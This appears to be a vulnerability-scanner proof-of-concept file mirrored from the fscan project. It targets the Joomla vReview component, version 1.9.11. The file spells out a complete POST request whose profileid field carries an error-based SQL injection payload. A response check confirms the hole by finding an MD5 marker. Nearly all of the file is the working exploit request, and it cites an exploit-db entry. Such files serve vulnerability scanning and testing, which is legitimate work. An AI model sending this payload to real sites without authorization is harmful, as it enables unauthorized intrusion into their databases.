mirror of https://github.com/qwqdanchun/fscan.git
19 lines
607 B
YAML
19 lines
607 B
YAML
name: poc-yaml-joomla-component-vreview-sql
|
|
set:
|
|
r1: randomInt(800000000, 1000000000)
|
|
rules:
|
|
- method: POST
|
|
path: /index.php?option=com_vreview&task=displayReply
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
body: >-
|
|
profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)#
|
|
follow_redirects: true
|
|
expression: |
|
|
response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
|
|
detail:
|
|
author: 南方有梦(https://github.com/hackgov)
|
|
Affected Version: "1.9.11"
|
|
links:
|
|
- https://www.exploit-db.com/exploits/46227
|